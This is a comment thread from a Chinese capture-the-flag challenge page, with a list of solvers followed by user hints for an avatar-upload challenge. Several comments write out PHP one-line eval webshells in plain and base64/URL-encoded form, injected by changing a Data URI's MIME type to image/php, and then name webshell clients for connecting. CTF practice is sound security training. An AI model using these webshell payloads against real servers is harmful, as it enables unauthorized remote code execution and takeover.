评分(12)
解题动态
杰哥 攻破了该题 8天前
dacming9527 攻破了该题 8天前
ggtom 攻破了该题 9天前
Ahri 攻破了该题 9天前
wjzkifaa 攻破了该题 9天前
win11 攻破了该题 10天前
Allenn 攻破了该题 10天前
声声慢 攻破了该题 10天前
TTxyz 攻破了该题 10天前
Exo_king 攻破了该题 10天前
ljy1997 攻破了该题 10天前
阜阳朴昌范 攻破了该题 10天前
flag与她皆失 攻破了该题 11天前
qiu111 攻破了该题 11天前
hkyj 攻破了该题 14天前
寒醨 攻破了该题 14天前
S-killer 攻破了该题 15天前
mybugku26 攻破了该题 15天前
汤布里伯 攻破了该题 16天前
评论
阜阳朴昌范 10天前
举报
人在广东已经朴到失联~~~~ 先注册登录,再修改头像,上传头像的时候进行BP抓包,观察image字段,本题的突破点在于修改Data URI中的MIME类型和Base64数据,然后发包,send并拿到路径,然后蚂蚁宝剑连接,然后扫描flag文件即可
微笑刺客 1月前
举报
上传一张正常图片,提交时候BP截包,内容改为data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTs/Pg==(base64后得结果),工具直连,拿flag
言寺介 5月前
举报
先上传正常图片,不然一直转圈圈,然后抓包修改图片data%3Aimage%2Fphp%3Bbase64%2C后面接一句话木马base64加密,然后蚁剑
ixin 6月前
举报
image=data%3aimage%2fphp%3bbase64%2cIDw%2fcGhwIGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4%3d
zhuizhui 11月前
举报
在post body构造一句话木马 image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== url 解码后即为 image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
llc123 1年前
举报
thinkphp v5.1.35 lts和xss不知道有没有操作空间
LoadOverload 1年前
举报
用webacoo亦可解决
Zhumeng 1年前
举报
注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php
zhuohao 1年前
举报
蚁剑一直返回数据为空 一直连不上
hackhui 1年前
举报
一句话木马传参加''
LLTVLL 1年前
举报
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题